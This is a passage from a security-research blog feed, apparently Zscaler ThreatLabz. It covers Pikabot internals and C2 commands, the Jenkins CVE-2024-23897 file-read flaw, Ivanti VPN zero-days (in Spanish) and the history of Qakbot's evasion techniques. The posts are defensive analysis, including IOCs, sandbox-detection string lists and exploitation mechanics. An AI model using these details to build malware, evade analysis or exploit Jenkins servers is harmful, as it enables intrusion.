cns[number_of_cns]; int beacon_time_ms; int delay_time_ms; int delay_seed_mul; // Multiplies this value with the calculated value of the operation - delay_seed_mul * 1000. int maximum_cnc_connection_attempts; size_t len_bot_version // major version + minor version wchar_t* major_version; // 1.8. int len_remaining_bytes_to_read; // Added to the first member and shows how many more bytes to read right after `len_remaining_structure` }; struct wchar_string { size_t length; wchar_t* wstring; }; struct cnc { size_t len_cnc; wchar_t* cnc; int cnc_port; int connection_attempts; bool http_connection_settings; };Once Pikabot parses the plaintext configuration, it erases it by setting all bytes to zero. We assess that this is an anti-dumping method to avoid automating the extraction of the configuration.Lastly, Pikabot loads any remaining required Windows API functions and generates a bot identifier for the compromised host. The algorithm is similar to previous versions and can be reproduced with the following Python code.def checksum(input: int) -> int: return (0x10E1 * input + 0x1538) & 0xffffffff def generate_bot_id_set_1(host_info: bytes, volume_serial_number: int) -> int: for current_character in host_info.lower(): volume_serial_number *= 5 volume_serial_number += current_character bot_id_part_1 = checksum(volume_serial_number & 0xffffffff) return bot_id_part_1 def generate_bot_id_set_2(volume_serial_number: int) -> int: bot_id_part_2 = checksum(volume_serial_number) bot_id_part_2 = checksum(bot_id_part_2) return bot_id_part_2 def generate_bot_id_set_3(bot_id_part_2: int) -> int: out = [] for i in range(8): bot_id_part_2 = checksum(bot_id_part_2) out.append(bot_id_part_2 & 0xff) out = bytes(out[-4:]) return int.from_bytes(out, byteorder='little') host_info = b"username|hostname" volume_serial_number = int("",16) bot_id_part_1 = generate_bot_id_set_1(host_info, volume_serial_number) bot_id_part_2 = generate_bot_id_set_2(volume_serial_number) bot_id_part_3 = generate_bot_id_set_3(bot_id_part_2) bot_id = f"{bot_id_part_1:07X}{bot_id_part_2 & 0xffff:09X}{bot_id_part_3}"ANALYST NOTE: In some samples, Pikabot does not read the volume serial number due to a bug in their code that causes a failure when calling GetVolumeInformationW.Network communicationsPikabot contacts the command-and-control server to request and receive network commands. In this version, the network protocol has considerably changed. Pikabot starts by registering the compromised host to its server. First, Pikabot collects information from the compromised host, such as:Monitor’s display settingsWindows versionHostname/username and operating system’s memory sizeBeacon and delay settingsProcess information such as the process ID, parent process ID and number of threads (see the description of network command 0x985 for a comprehensive list).Bot’s version and campaign nameName of the domain controllerThen Pikabot appends the following information to the registration packet:32-bytes network RC4 key (unique per host), which remains the same for the session. In previous versions, Pikabot was using AES-CBC with a random key/IV per request.Unknown registry key name. We observed it used only in the network command with ID 0x246F.Number of swap rounds used for encoding the data. This remains the same for the rest of the session.Next, Pikabot encrypts the data using the RC4 algorithm, encodes the encrypted output, picks a random URI from its list, and sends the data with a POST request to the command-and-control server.The encoding involves bytes swapping for N times, where N is a randomly generated number in the range 0-25.ANALYST NOTE: Despite the fact that a round number is set in the configuration (see the configuration structure), this value is ignored and Pikabot replaces it with a random value. Moreover, Pikabot has completely removed the JSON format in its network packets and inserts everything in a raw format.If the bot registration is successful, Pikabot starts an infinite loop to request and execute commands. Each incoming network command (with the exception of network command with ID 0x164) has a task ID that is placed at the start of the (decrypted) packet as a QWORD value. In Table 1 below, we list the identified network commands along with a description of their functionality.Command IDDescription0x164Requests command from command-and-control server. The packet includes the command ID, size of bot ID, and the bot ID. The server replies with the same command ID if there is no network command for the bot to execute.0x555Reports the output of the executed network command to the command-and-control server.0x1291Registers the bot. An unknown integer value (0x1687) is appended in the packet at offset 8.0x1FEDUpdates beacon time.0x1A5ATerminates/kills the bot.0x2672Not implemented0x246FWrites a file to disk and adds registry data using the value name specified in the configuration (unknown_registry_key_name).0xACBExecutes the system command and sends back the output. Includes the error code 0x1B3 if there is no output.0x36CInjects the code of a downloaded PE file. The target process information is specified in the network packet.0x792Injects the code of a downloaded shellcode. The target process information is specified in the network packet.0x359Executes system command and sends back the output.Note: Same as 0xACB but does not send the error code.0x3A6Executes system command and sends back the output.Note: Same as 0xACB but does not send the error code.0x240Executes system command and sends back the output.Note: Same as 0xACB but does not send the error code.0x985Collects processes’ information. These are:Executable's filenameProcess IDBoolean flag, which indicates if it is a Pikabot process.Boolean flag, which indicates if Pikabot can access the process with all possible access rights.Number of threadsBase priority of threadsProcess architectureParent process ID0x982Not implementedTable 1. Pikabot Network CommandsConclusion Despite its recent inactivity, Pikabot continues to pose a significant cyber threat and is in constant development. However, the developers have decided to take a different approach and decrease the complexity level of Pikabot's code by removing advanced obfuscation features. Moreover, based on our code analysis, it appears that certain features and network commands have not been implemented yet and are still a work in progress. Zscaler ThreatLabz continues to track this threat and add detections to protect our customers. Indicators Of Compromise (IOCs) SHA256 Description 555687ca3149e23ee980a3acf578e0572da556cf34c87aecf48596834d6b496f Pikabot sample (version 1.8.32-beta) ca5fb5814ec62c8f04936740aabe2664b3c7d036203afbd8425cd67cf1f4b79d Pikabot sample (version 1.8.32-beta) IOC Description 104.129.55[.]103:2224 Command-and-Control server 178.18.246[.]136:2078 Command-and-Control server 158.220.80[.]167:2967 Command-and-Control server 104.129.55[.]104:2223 Command-and-Control server 23.226.138[.]161:5242 Command-and-Control server 37.60.242[.]85:9785 Command-and-Control server 23.226.138[.]143:2083 Command-and-Control server 37.60.242[.]86:2967 Command-and-Control server 85.239.243[.]155:5000 Command-and-Control server 158.220.80[.]157:9785 Command-and-Control server 65.20.66[.]218:5938 Command-and-Control server 95.179.191[.]137:5938 Command-and-Control server 139.84.237[.]229:2967 Command-and-Control server Zscaler Coverage In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to Pikabot at various levels with the following threat names: Win32.Trojan.PikaBot Win32.Downloader.PikaBot Mon, 12 feb 2024 10:11:52 -0800 Nikolaos Pantazopoulos Jenkins Arbitrary File Leak Vulnerability, CVE-2024-23897, Can Lead To RCE Introduction Jenkins, a Java-based open-source automation server widely used by developers for application building, testing, and deployment, has issued an advisory about a critical vulnerability that could potentially enable remote code execution (RCE). This vulnerability, identified as CVE-2024-23897, poses a high risk and affects Jenkins integrated command line interfaces (CLI). With a CVSS score of 9.8, unauthorized access to files through the CLI is possible, potentially leading to RCE. In addition to file access, CVE-2024-23897 can be leveraged to access binary files that contain cryptographic keys utilized for various Jenkins functionalities, albeit with certain limitations. Unauthorized access to this sensitive information can result in: RCE through the exploitation of resource root URLs RCE by manipulating a "Remember me" cookie RCE through stored cross-site scripting (XSS) attacks via build logs RCE by bypassing CSRF protection Decryption of stored secrets in Jenkins Deletion of any item within Jenkins The downloading of Java heap dumps Affected Versions The vulnerability affects Jenkins versions up to 2.441 and LTS (Long-Term Support) versions up to 2.426.2. Technical Details The vulnerability originates from Jenkins' use of the args4j library for parsing command arguments and options on the Jenkins controller during the processing of CLI commands. Originally intended to enhance usability, a specific feature within args4j that replaces a file path preceded by an "@" character with the file's contents has become a significant security issue. This feature is enabled by default and remains unchecked in versions up to 2.441 and LTS 2.426.2. Exploiting this vulnerability allows attackers to read any files on the Jenkins controller file system using the default character encoding of the Jenkins controller process. When Jenkins CLI tool arguments are prefixed with “@”, they are mistakenly interpreted as files that need to be opened to read the arguments. In certain scenarios, lines from these files are inadvertently included in error messages and transmitted to the CLI user. Two Jenkins configuration options pose significant security risks by allowing unauthenticated attackers to impersonate authenticated users. The first option, “Allow users to register,” enables anyone with access to a Jenkins instance to register an account. Additionally, the “Enable anonymous read permission” option grants universal read permissions, allowing any Jenkins user to access and read the entire content of arbitrary files on the Jenkins server when these options are enabled. Figure 1. Jenkins configuration options The figure below is an example taking the first rows of the C:\Users\IEUser\AppData\Local\Temp\JenkinsTest.txt (a random file created on the Jenkins server for demonstration) file using the CLI help command. Figure 2. A demonstration text file created on the Jenkins server There are two ways to invoke this vulnerability: Using Jenkins-cli.jar: This common approach involves utilizing Jenkins-cli.jar, which operates through web sockets or SSH. Specifically, commands such as shutdown, enable-job, help, and connect-node from the Jenkins CLI tool are manipulated to illicitly access and read the content of files on the Jenkins server. The figure below shows the help command running on Jenkins CLI to read a file. Figure 3. Running the help command with Jenkins CLI tool to read the file content on Jenkins The figure below shows the file content being read from the Jenkins server. Figure 4: File content read from the Jenkins server Sending POST requests: An alternative method is to send two POST requests to http://jenkins/cli?remoting=false. This technique requires the use of a downloader and an uploader. The downloader fetches the response of the CLI command, while the uploader executes a specified CLI command provided in the body of the request. The connection between the downloader and uploader is established by utilizing the UUID from the session header. Figure 5. Attack workflow demonstrating malicious HTTP request Recommendations To mitigate this vulnerability, upgrade to at least Jenkins versions 2.442 and LTS 2.426.3. This patch disables the command parser feature responsible for the vulnerability. Those unable to immediately update to Jenkins 2.442 and LTS 2.426.3 should disable access to the Jenkins CLI, as this is expected to prevent exploitation. For instructions, see the documentation for this workaround. Zscaler Coverage The Zscaler ThreatLabZ team has deployed protection. Zscaler Advanced Threat Protection: APP.EXPLOIT.CVE-2024-23897 References CVE-2024-23897 (CVSS 9.8): Critical Jenkins Security Vulnerability, RCE Possible Jenkins Security Advisory 2024-01-24 - binganao/CVE-2024-23897 · GitHub RCE Jenkins CVE-2024–23897. Background Story | by Syed Abeer Ahmed Jenkins 2.441 / LTS 2.426.3 Arbitrary File Read ≈ Packet Storm Tue, 06 feb 2024 15:44:05 -0800 Avinash Kumar Asesor de cobertura de ThreatLabz: Vulnerabilidades de VPN de Ivanti explotadas por hackers, nuevos días cero plantean un riesgo crítico Introducción Ivanti, una empresa de gestión de TI y seguridad, ha emitido una advertencia sobre múltiples vulnerabilidades de día cero en sus productos VPN explotadas por hackers chinos patrocinados por el Estado desde diciembre de 2023. La revelación inicial implicaba dos CVE (CVE-2023-46805 y CVE-2023-21887) que permitían a un atacante remoto eludir la autenticación y realizar exploits de inyección remota de comandos. Ivanti publicó un parche que fue eludido inmediatamente por dos fallas adicionales (CVE-2024-21888 y CVE-2024-21893) que permiten a un atacante realizar exploits de escalada de privilegios y falsificación de peticiones del lado del servidor.  La Agencia de Ciberseguridad y Seguridad de Infraestructuras (CISA) publicó un aviso inicial y una directriz de emergencia (ED-24-01) estableciendo el plazo para mitigar los dos problemas originales antes de las 23:59 EST del 22 de enero de 2024. A raíz del descubrimiento de las dos nuevas vulnerabilidades y de la falta de parches, CISA emitió una directriz suplementaria a la directiva de emergencia en la que se instruía a los organismos de la rama ejecutiva civil federal a desconectar todas las instancias de las soluciones Ivanti Connect Secure (ICS) e Ivanti Policy Secure (IPS) a más tardar a las 23:59 EST del 2 de febrero de 2024 de las redes de los organismos. Recomendaciones Para CVE-2023-46805 y CVE-2023-21887 Aplique el parche: Ivanti ha lanzado un parche para solucionar las dos vulnerabilidades iniciales. Se aconseja a los usuarios que apliquen este parche cuanto antes para asegurar sus sistemas. Realice un restablecimiento de fábrica antes del parche: Ivanti recomienda a los usuarios que realicen un restablecimiento de fábrica en su dispositivo antes de aplicar el parche. Este paso de precaución tiene como objetivo evitar que los posibles malintencionados obtengan persistencia de actualización en el entorno.  Para CVE-2023-21888 y CVE-2023-21893 Dirección suplementaria de la CISA (ED-24-01): CISA instruyó a los organismos federales a desconectar todas las instancias de las soluciones Ivanti Connect Secure (ICS) e Ivanti Policy Secure (IPS) de las redes de los organismos. Aunque la directriz de CISA ordena esto para los organismos FCEB, CISA recomienda encarecidamente a todas las organizaciones que sigan los pasos recomendados. Aplique los parches a medida que estén disponibles siguiendo las indicaciones recomendadas. Para todos los problemas detectados Priorice la segmentación de todos los sistemas potencialmente afectados de los recursos de la empresa para reducir el radio de alcance Continúe la caza de amenazas para todos los dispositivos conectados a y desde los productos Ivanti afectados Supervise los servicios de gestión de identidades y las anomalías de autenticación. Audite activamente las cuentas privilegiadas creadas o actualizadas recientemente.  Rote los certificados, claves y contraseñas de todos los sistemas y aplicaciones conectados o expuestos. Atribución Se cree que UTA0178, un grupo de hackers chino patrocinado por el gobierno y dedicado al espionaje, es el responsable de explotar las vulnerabilidades de la VPN de ICS. Al mismo grupo se le atribuyen los ataques concentrados en Filipinas utilizando las familias de malware MISTCLOAK, BLUEHAZE y DARKDEW. Cómo funciona Se observó que los atacantes explotaban dos vulnerabilidades CVE-2023-46805 (una vulnerabilidad para eludir la autenticación con una puntuación CVSS de 8.2) y CVE-2024-21887 (una vulnerabilidad de inyección de comandos encontrada en varios componentes web con una puntuación CVSS de 9.1) para obtener acceso a los dispositivos ICS VPN. La actividad inicial se observó a partir del 3 de diciembre de 2023. En su mayor parte se abastecían de lo que encontraban, pero también utilizaron algunas herramientas.  Las herramientas utilizadas por el malintencionado incluyen:  Tunelador PySoxy y BusyBox para permitir la actividad posterior a la explotación  Puerta trasera pasiva ZIPLINE  Derivación THINSPOOL  LIGHTWIRE  WIREFIRE, BUSHWALK y Shells Web CHAINLINE  WARPWIRE Cadena de ataque Figura 1: Diagrama que representa la cadena de ataque. Posible ejecución Explotación inicial: Los atacantes realizaron escaneos masivos en busca de dispositivos vulnerables y posible explotación automatizada.  Persistencia: Los atacantes implementaron diferentes variaciones de shells web en los dispositivos seleccionados tras una explotación exitosa. Tras conseguir un punto de apoyo inicial, el atacante podría robar datos de configuración, modificar archivos existentes, descargar archivos remotos y realizar un túnel inverso desde los dispositivos. Además, los atacantes abrieron puertas traseras en los archivos de configuración e implementaron herramientas adicionales. Reconocimiento: Los atacantes realizaron un reconocimiento de los sistemas y aplicaciones internos a través de conexiones proxy. CredencialStealing: Los atacantes inyectaron un malware personalizado basado en JavaScript, llamado WARPWIRE, en una página de inicio de sesión utilizada por los usuarios para capturar y filtrar credenciales de texto sin formato. Movimiento lateral: Los atacantes utilizaron movimiento lateral mediante credenciales comprometidas para conectarse a sistemas internos a través de RDP, SMB y SSH.  Borrado de pruebas: Se observó a los atacantes borrando registros e incluso restaurando el sistema a un estado limpio después de implementar sus cargas útiles. Evasión (parche y detección): En algunos casos, los atacantes modificaron la herramienta de comprobación de integridad (ICT) para desactivarla e impedir que marcara cualquier modificación o adición en el sistema como medida para evadir la detección. La herramienta ZIPLINE utilizada por los atacantes es capaz de eludir la detección ICT añadiéndose a sí misma a la exclusion_list (lista de exclusión) utilizada por la herramienta ICT. Además, a medida que los ataques eran descubiertos y publicitados, los atacantes se adaptaban rápidamente modificando las herramientas para eludir la detección. Como resultado, se están observando nuevas variantes del ataque inicial en ataques más recientes. Cómo puede ayudar Zscaler La solución de acceso a la red Zero Trust (ZTNA) nativa de la nube de Zscaler ofrece a los usuarios un acceso rápido y seguro a aplicaciones privadas para todos los usuarios, desde cualquier ubicación. Reduzca su superficie de ataque y el riesgo de movimiento lateral de amenazas: no más direcciones IP de acceso remoto expuestas a Internet y conexiones seguras con intermediarios de adentro hacia afuera. Fácil de implementar y aplicar políticas de seguridad uniformes en todo el campus y en usuarios remotos. Zscaler Private Access™ (ZPA) permite a las organizaciones asegurar el acceso privado a aplicaciones desde cualquier lugar. Conecte a los usuarios con las aplicaciones, nunca con la red, con la segmentación de usuario a aplicación impulsada por la IA. Evite el movimiento lateral de amenazas con conexiones de adentro hacia afuera. Implemente protección integral de datos y ciberamenazas para aplicaciones privadas con protección integrada de aplicaciones, engaño y protección de datos. Figura 2: Las vulnerabilidades de VPN abren puertas a las ciberamenazas y protegen contra estos riesgos con la arquitectura Zero Trust. Zero Trust es una arquitectura fundamentalmente diferente a las basadas en firewalls y VPN. Ofrece seguridad como servicio desde la nube y en el perímetro, en lugar de exigirle que redirija el tráfico a complejas pilas de dispositivos (ya sean hardware o virtuales). Proporciona conectividad segura entre todos de manera individualizada; por ejemplo, conectar cualquier usuario directamente a cualquier aplicación. No coloca a ninguna entidad en el conjunto de la red y se adhiere al principio del acceso con privilegios mínimos. En otras palabras, con Zero Trust, la seguridad y la conectividad se desvinculan satisfactoriamente de la red, lo que le permite eludir los problemas mencionados anteriormente relacionados con los enfoques basados en el perímetro. Arquitectura Zero Trust: Minimiza la superficie de ataque al eliminar firewalls, VPN y direcciones IP públicas, no permitir conexiones entrantes y ocultar aplicaciones detrás de una nube Zero Trust.  Evita el riesgo aprovechando la potencia de la nube para inspeccionar todo el tráfico, incluido el cifrado a escala, con el fin de aplicar las políticas y detener las amenazas en tiempo real.  Evita el movimiento lateral de amenazas al conectar entidades a recursos de TI individuales en lugar de extender el acceso a la red en su conjunto.  Bloquea la pérdida de datos aplicando políticas en todas las posibles rutas de fuga (incluido el tráfico cifrado), protegiendo los datos en movimiento, los datos en reposo y los datos en uso. Además, la arquitectura Zero Trust soluciona muchos otros problemas relacionados con firewalls, VPN y arquitecturas basadas en perímetro al mejorar las experiencias del usuario, disminuir la complejidad operativa, ahorrar dinero a su organización y más.  Zscaler ThreatLabz recomienda a nuestros clientes implementar las siguientes capacidades para protegerse contra este tipo de ataques: Proteja las aplicaciones más importantes limitando el movimiento lateral mediante Zscaler Private Access para establecer políticas de segmentación de usuario a aplicación basadas en los principios de acceso con privilegios mínimos, incluso para empleados y contratistas externos. Limite el impacto de un compromiso potencial restringiendo el movimiento lateral con una microsegmentación basada en la identidad. Evite la explotación privada de aplicaciones privadas de usuarios comprometidos con la inspección completa en línea del tráfico de aplicaciones privadas, con Zscaler Private Access. Utilice Advanced Cloud Sandbox para evitar el malware desconocido enviado en cargas útiles de segunda etapa. Detecte y contenga a los atacantes que intentan moverse lateralmente o escalar privilegios atrayéndolos con servidores señuelo, aplicaciones, directorios y cuentas de usuario con Zscaler Deception. Identifique y detenga la actividad maliciosa de los sistemas comprometidos enrutando todo el tráfico del servidor a través de Zscaler Internet Access. Restrinja el tráfico procedente de infraestructuras críticas a una lista "permitida" de destinos confiables. Asegúrese de que está inspeccionando todo el tráfico SSL/TLS, incluso si procede de fuentes de confianza. Active Advanced Threat Protection para bloquear todos los dominios de comando y control conocidos. Amplíe la protección de comando y control a todos los puertos y protocolos con Advanced Cloud Firewall, incluidos los destinos de C&C que surjan. Mejores prácticas Siga las directrices de CISA El cumplimiento puntual de la Directriz de Emergencia sobre Vulnerabilidades de Ivanti del CISA es fundamental para minimizar el impacto de estas vulnerabilidades. Implemente una arquitectura Zero Trust. Las empresas deben replantearse los enfoques tradicionales de la seguridad, sustituyendo los dispositivos vulnerables como las VPN y los firewalls. Implementar una verdadera arquitectura Zero Trust, reforzada por modelos de IA/ML, para bloquear y aislar el tráfico malicioso y las amenazas es un paso fundamental. Priorice la segmentación usuario-aplicación cuando no vaya a introducir a los usuarios en la misma red que sus aplicaciones. Esto brinda una manera eficaz de evitar el movimiento lateral y evitar que los atacantes alcancen las aplicaciones más importantes.  Medidas proactivas para proteger su entorno A la luz de las recientes vulnerabilidades que afectan a Ivanti, es imprescindible emplear las siguientes mejores prácticas para reforzar su organización contra posibles exploits. Minimice la superficie de ataque: Haga que las aplicaciones (y las VPN vulnerables) sean invisibles a Internet e imposibles de comprometer, garantizando que un atacante no pueda obtener el acceso inicial. Prevenga el compromiso inicial: Inspeccione todo el tráfico en línea para detener automáticamente los exploits de día cero, el malware u otras amenazas sofisticadas. Imponga el acceso con privilegios mínimos: Restrinja los permisos para los usuarios, el tráfico, los sistemas y las aplicaciones utilizando la identidad y el contexto, garantizando que solo los usuarios autorizados puedan acceder a los recursos designados. Bloquee el acceso no autorizado: Utilice una autenticación multifactor (MFA) fuerte para validar las solicitudes de acceso de los usuarios.  Elimine el movimiento lateral: Conecte a los usuarios directamente a las aplicaciones, no a la red, para limitar el radio de alcance de un posible incidente. Bloquee a los usuarios comprometidos y las amenazas internas: Habilite la inspección y supervisión en línea para detectar usuarios comprometidos con acceso a su red, aplicaciones privadas y datos. Detenga la pérdida de datos: Inspeccione los datos en movimiento y los datos en reposo para detener el robo activo de datos durante un ataque. Implemente defensas activas: Aproveche la tecnología de engaño con señuelos y realice una inspección diaria de amenazas para frustrar y capturar los ataques en tiempo real. Fomente una cultura de la seguridad: Muchas infracciones comienzan con el compromiso de la cuenta de un solo usuario a través de un ataque de phishing. Dar prioridad a la capacitación periódica en concienciación sobre ciberseguridad puede ayudar a reducir este riesgo y a proteger a sus empleados frente al compromiso.  Ponga a prueba su postura de seguridad: Obtenga evaluaciones periódicas de riesgos por parte de terceros y lleve a cabo actividades de equipo púrpura para identificar y endurecer las brechas de su programa de seguridad. Solicite a sus proveedores de servicios y socios tecnológicos que hagan lo mismo y comparta los resultados de estos informes con su equipo de seguridad. Conclusión En conclusión, los productos VPN de Ivanti enfrentan graves amenazas de seguridad debido a múltiples vulnerabilidades de día cero explotadas por hackers patrocinados por el estado. La divulgación inicial reveló CVE críticas que permitían accesos no autorizados e inyecciones de comandos remotos. Tras el lanzamiento del parche de Ivanti, los malintencionados explotaron rápidamente dos fallas adicionales que permitían la escalada de privilegios.  CISA ha respondido con una directriz consultiva y de emergencia, estableciendo plazos para mitigar los problemas originales. Con el descubrimiento de nuevas vulnerabilidades y la ausencia de parches, CISA emitió una directriz suplementaria, ordenando a los organismos federales desconectar las soluciones Ivanti ICS e IPS de las redes antes de las 23:59 EST, del 2 de febrero de 2024. Fri, 02 feb 2024 14:11:41 -0800 Deepen Desai Tracking 15 Years of Qakbot Development Introduction Qakbot (aka QBot or Pinkslipbot) is a malware trojan that has been used to operate one of the oldest and longest running cybercriminal enterprises. Qakbot has evolved from a banking trojan to a malware implant that can be used for lateral movement and the eventual deployment of ransomware. In August 2023, the Qakbot infrastructure was dismantled by law enforcement. However, just several months later in December 2023, the fifth (and latest) version of Qakbot was released, marking more than 15 years of development. In this blog, we will analyze Qakbot from the first version dating back to 2008 through the most recent version that continues to be updated as of January 2024. Our analysis demonstrates the threat actor behind Qakbot is resilient, persistent, and innovative. Key Takeaways Qakbot originated in 2008 as a banking trojan designed to steal credentials and conduct ACH, wire, and credit card fraud. In recent years, Qakbot has become an initial access broker delivering Cobalt Strike for lateral movement and ultimately resulting in second-stage infections including ransomware like BlackBasta. Over the years, Qakbot’s anti-analysis techniques have improved to evade malware sandboxes, antivirus software, and other security products. The malware is modular and can download plugins that enable it to dynamically add new functionality. The threat group behind Qakbot has now released five distinct versions of the malware with the latest release in December 2023. A Brief History of Qakbot ThreatLabz researchers have been tracking Qakbot for more than a decade and our analysis started with samples that date back to 2008. These early versions of Qakbot contained a date timestamp rather than a version number. However, we will refer to these samples as version 1.0.0 for clarity and consistency with subsequent versions. At that time, Qakbot leveraged a dropper with two embedded components in the resource section that consisted of a malicious DLL and a tool to inject the DLL into running processes. The Qakbot DLL implemented a wide variety of features including: a SOCKS5 server, stealing passwords, harvesting web browser cookies, and spreading via SMB. These early versions were heavily developed and even had a feature to report crash dumps. In 2011, Qakbot introduced a versioning system that started with 2.0.0 that has signified major developmental milestones over time. The Qakbot major version number is a three-digit hexadecimal value with 0x500 (or 5.0.0) being the most recent. Qakbot was largely used for banking fraud until 2019, when the threat actor pivoted to serving as an initial access broker for ransomware including Conti, ProLock, Egregor, REvil, MegaCortex, and BlackBasta. The following timeline illustrates the key developments for each version of Qakbot. Each version of Qakbot represents a snapshot in time and is indicative of the threat landscape during that period. For instance, early versions contained hardcoded command-and-control (C2) servers. As time progressed, law enforcement and malware researchers worked successfully with domain registrars to suspend malicious domains. In response, the Qakbot threat actor added network encryption and implemented a solution to remove the C2 server’s single point of failure by adding a domain generation algorithm (DGA). While a DGA addressed the single point of failure issue, it also created significant noise when querying for a large number of domains. As a result, the Qakbot developer devised a new multi-tiered architecture that leveraged compromised systems to act as proxy servers that relay network traffic between other infected systems and the backend C2 infrastructure. This design update addressed the single point of failure problem, reduced network traffic, and effectively hid the subsequent C2 tiers. In the following sections, we will analyze key areas where Qakbot has evolved significantly including anti-analysis techniques, network communication, and the implementation of a modular design. Anti-Analysis Techniques Qakbot has implemented anti-analysis techniques from the beginning of its development including string obfuscation, API obfuscation, and malware sandbox evasion. String obfuscation Every version of Qakbot since its inception has obfuscated the malware’s important strings with a simple XOR algorithm. The XOR key (and most recently, the derivation of an XOR key) is used to decrypt strings. Moreover, the reference structure to the strings has also evolved across versions. In the first two versions (1.0 and 2.0), the malware decrypted a block of strings from the data section, overwriting the original encrypted block, and the unencrypted strings remained in memory as shown in Figure 1. This simple design was likely an attempt to evade static antivirus signatures. Figure 1. Early versions of Qakbot string obfuscation In later versions of Qakbot, the XOR key length was significantly increased, and strings were decrypted and copied to a newly allocated buffer. Qakbot version 5.0 made perhaps the most significant change to the string encryption algorithm. The strings are still encrypted with a simple XOR key. However, the XOR key is no longer hardcoded in the data section. Instead the XOR key is encrypted with AES, where the AES key is derived by performing a SHA256 hash of a buffer. A second buffer contains the AES initialization vector (IV) as the first 16 bytes, followed by the AES-encrypted XOR key. Once the XOR key has been decrypted, the block of encrypted strings can then be decrypted as shown in Figure 2. Figure 2. Qakbot 5.0 string decryption API obfuscation In versions 1 and 2, Qakbot carried a list of Windows API names used by the malware in the encrypted strings table. After the strings table was decrypted, the code would dynamically resolve the address of each API at runtime and then initialize a table of pointers that could then be used by Qakbot to invoke the corresponding function when required. This implementation made it harder for malware researchers and antivirus software to statically determine the APIs used at runtime. In more modern versions, the Qakbot developer further obfuscated the use of APIs by resolving the imports using a CRC32 hash rather than a string. At first, Qakbot used the CRC hashes of the API name directly, and subsequent versions performed an XOR with a hardcoded value and the CRC hash. Figure 3 shows an example of this dynamic API import hashing algorithm. Figure 3. Example Qakbot API obfuscation Junk code Over time, Qakbot has introduced blocks of code that are deliberately non-functional to defeat static antivirus signatures as shown in Figure 4. In the example below, a block of junk code was added prior to an RC4 initialization routine. Figure 4. Example of Qakbot junk code block in an RC4 initialization function Anti-sandbox techniques Qakbot has implemented numerous detection mechanisms to identify researcher environments and malware sandboxes since the earliest versions. In particular, Qakbot has attempted to identify processes, system artifacts, and the underlying virtual machines associated with an analysis environment. Figure 5 shows an example of Qakbot’s implementation to identify whether an infected system is running on a VMWare virtual machine from a sample dating back to September 2009. Figure 5. Qakbot implementation to identify VMWare Qakbot has continuously added code to identify analysis environments by checking system information such as the name of BIOS vendors, processes, drivers, etc. for strings as shown in Table 1. vmxnet vmx_svga vmrawdsk vmdebug vm3dmp vSockets srootkit sbtisht ansfltr Xen XENVIF XENSRC XENCLASS XENBUS Vmscsi VirtualBox Virtual Machine Virtual HD VirtIO VRTUAL VMware server memory VMware SVGA VMware SCSI VMware Replay VMware Pointing VMware Accelerated VMware VMW VMAUDIO VIRTUAL-DISK VBoxVideo QEMU PROD_VIRTUAL_DISK MS_VM_CERT CWSandbox 20202020 Table 1. Qakbot virtual machine string-based detections The following processes in Table 2 are frequently used by malware analysts and are also detected by Qakbot: frida-winjector-helper-32.exe packetcapture.exe filemon.exe proc_analyzer.exe sniff_hit.exe frida-winjector-helper-64.exe capturenet.exe procmon.exe sysAnalyzer.exe sysAnalyzer.exe tcpdump.exe qak_proxy idaq64.exe sniff_hit.exe BehaviorDumper.exe windump.exe dumpcap.exe loaddll32.exe joeboxcontrol.exe processdumperx64.exe ethereal.exe CFF Explorer.exe PETools.exe joeboxserver.exe anti-virus.EXE wireshark.exe not_rundll32.exe ImportREC.exe ResourceHacker.exe sysinfoX64.exe ettercap.exe ProcessHacker.exe LordPE.exe x64dbg.exe sctoolswrapper.exe rtsniff.exe tcpview.exe SysInspector.exe Fiddler.exe sysinfoX64.exe FakeExplorer.exe apimonitor-x86.exe idaq.exe dumper64.exe user_imitator.exe Table 2. Malware analyst process names detected by Qakbot Around version 404.510, the malware developer added extraneous exports to the Qakbot stager DLL to confuse malware sandboxes as shown in Figure 6. In this example, the export name Wind (or ordinal #458) is the actual entry point. Figure 6. Qakbot 404.510 sample with 458 entries in the exports directory Network CommunicationQakbot has leveraged HTTP for C2 communication from the beginning. However, the network protocol on top of HTTP has changed significantly over the years with encryption, RSA signature verification, and the addition of a JSON-based message format.Network protocol and encryptionQakbot has continuously updated its message protocol with version 19 being the latest. The protocol specifies the format of the message. In version 3, Qakbot sent requests in a format similar to the following:protoversion=9&r=1&n=kvtjmq970452&os=, this protocol format was later replaced with a JSON-based protocol with integer key values that denote specific fields as shown below:{ "8":1, "5":1035, "1":19, // protocol version "59":0, "3":"obama259", "4":1028, "10":1683022694, "2":"kqsvfc505763", "6":59661, "14":"Xgd1KxZQKTHGB6IxwtIy2e0RAq4iFNE6w6", "7":16759, "101":1, "26":"WORKGROUP", "73":0 }This encoding adds a layer of obfuscation for each of the message fields.Qakbot’s network encryption has used RC4 with the key consisting of 16 random bytes concatenated with a hardcoded salt and hashed using SHA1. The most recent version of Qakbot now uses AES encryption with the key consisting of 16 random bytes concatenated with a hardcoded salt and hashed using SHA256. After encryption, the data is Base64 encoded and prepended to a variable in the body of an HTTP POST request.Domain generation algorithmThe first versions of Qakbot only used hardcoded C2s as shown in Figure 7.Figure 7. Example of hardcoded Qakbot C2sHowever, in version 2.0.1 a DGA was added as a backup C2 channel in the event that the hardcoded C2s were unreachable. Qakbot used a time-based DGA to generate up to 5,000 C2 domains for a specific date interval as shown in Figure 8.Figure 8. Qakbot DGA codeInterestingly, some versions of Qakbot would generate fake domains if an analysis environment was detected in an effort to mislead researchers, as shown in Figure 9.Figure 9. Example of Qakbot generating fake domains if network monitoring tools were detectedData exfiltration to compromised FTP serversQakbot versions 3.0.0 and earlier used compromised FTP servers to exfiltrate data rather than sending the data directly to their C2 server. The FTP credentials were stored in Qakbot’s configuration files as shown below:22=<ip address 1>:[email protected]:<credspassword1>: 23=<ip address 2>:[email protected]:<credspassword2>: 24=<ip address 3>:[email protected]:<credspassword3>: 25=<ip address 4>:[email protected]:<credspassword4>: 26= 3=1581496845This design had an inherent weakness since anyone with the FTP credentials could potentially have accessed and recovered the stolen information. To address this weakness, Qakbot was later updated to send the stolen data directly to Qakbot’s C2 infrastructure.Using compromised systems as relaysAfter version, Qakbot ceased using the DGA. Instead, Qakbot started using compromised systems themselves as C2 servers, and embedded a list of IP addresses and port numbers in the malware configuration. Before version, the configuration file (stored as an encrypted resource) contained the list of IP addresses in a text-based format:;0;443;0;443;0;443;0;995;0;995;0;995;0;2222;0;443;0;443 …However, after version, the Qakbot C2 list evolved into a binary format as shown in Figure 10.Figure 10. Qakbot C2 list binary 